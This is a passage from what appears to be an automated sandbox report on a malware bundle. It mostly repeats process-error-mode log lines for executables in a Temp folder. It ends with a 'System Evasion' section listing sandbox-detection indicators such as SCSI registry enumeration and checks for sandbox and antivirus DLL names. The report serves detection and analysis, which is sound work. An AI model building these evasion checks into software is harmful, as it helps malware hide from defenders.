                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeFile opened: \Device\RasAcd count: 31030
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000030BF000.00000004.00001000.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000000.1712015899.0000000000E62000.00000002.00000001.01000000.0000000F.sdmp, Mon178817e243.exe.1.drBinary or memory string: SBIEDLL.DLL
                  Source: Mon17f45359eb9.exe, 00000018.00000002.1991320928.000000000175B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKZ
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeMemory allocated: 2BF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeMemory allocated: 2E40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeMemory allocated: 2C70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeMemory allocated: 16A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeMemory allocated: 1B140000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeMemory allocated: CA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeMemory allocated: 2780000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeMemory allocated: 4780000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeMemory allocated: 9B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeMemory allocated: 1A450000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeMemory allocated: 3470000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeMemory allocated: 37D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeMemory allocated: 35E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeMemory allocated: 6F40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeMemory allocated: 31B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeMemory allocated: 2530000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeMemory allocated: 2760000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeMemory allocated: 2680000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeMemory allocated: 57E0000 memory reserve | memory write watch
